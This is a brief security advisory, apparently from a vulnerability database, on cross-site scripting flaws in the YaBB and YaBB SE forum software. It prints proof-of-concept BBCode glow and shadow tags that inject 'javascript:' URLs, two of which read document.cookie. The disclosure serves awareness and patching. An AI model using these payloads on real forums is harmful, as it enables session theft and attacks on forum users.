YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilites

YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilites

No exploit is required to leverage this issue. The following proof of concept has been provided:

[glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow]

[shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]

The following proof of concept has been supplied by frog-m@n:
[glow=red,2);background:url(javascript:[SCRIPT],300]text[/glow]